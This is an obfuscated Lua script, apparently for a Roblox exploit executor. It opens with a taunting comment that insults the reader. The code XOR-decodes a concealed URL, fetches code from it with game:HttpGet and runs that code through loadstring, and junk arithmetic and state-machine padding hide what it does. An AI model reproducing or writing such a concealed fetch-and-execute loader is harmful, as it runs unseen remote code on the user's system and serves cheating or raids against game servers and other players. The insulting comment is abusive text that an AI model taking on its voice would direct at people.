--[[
Lol
Loaded
Perfectly
No Errors
Stop trying to get this script its not worth it
What will u even accomplish?
Raids?
man ur just as stupid as ur mom.

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v17=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v17,v17 + 1 )),v1(v2(v9,1 + (v17% #v9) ,1 + (v17% #v9) + 1 )))%256 ));end return v5(v10);end task.spawn(function() local v11=0;local v12;local v13;local v14;local v15;local v16;while true do if (v11==2) then v16=nil;while true do if (v12==0) then v13=1065 -(68 + 997) ;v14=nil;v12=1;end if (v12==(1271 -(226 + 1044))) then v15=nil;v16=nil;v12=8 -6 ;end if (v12==(119 -(32 + 85))) then while true do if (v13==1) then if v15 then v15();else warn(v7("\15\194\43\193\239\55\223\35\203\251\99\203\43\204\240\38\201\112\133","\156\67\173\74\165")   .. tostring(v16) );end break;end if (v13==(0 + 0)) then v14=game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\232\48\234\180\229\12\222\140\248\42\233\176\206\27\253\204\220\34\227\169\136\12\212\197\200\106\238\190\198\26\194\140\214\36\239\181\136\50\222\196\210\38","\126\177\163\187\69\134\219\167"));v15,v16=loadstring(v14);v13=1 + 0 ;end end break;end end break;end if (v11==(958 -(892 + 65))) then v14=nil;v15=nil;v11=4 -2 ;end if (v11==(0 -0)) then v12=0 -0 ;v13=nil;v11=351 -(87 + 263) ;end end end);
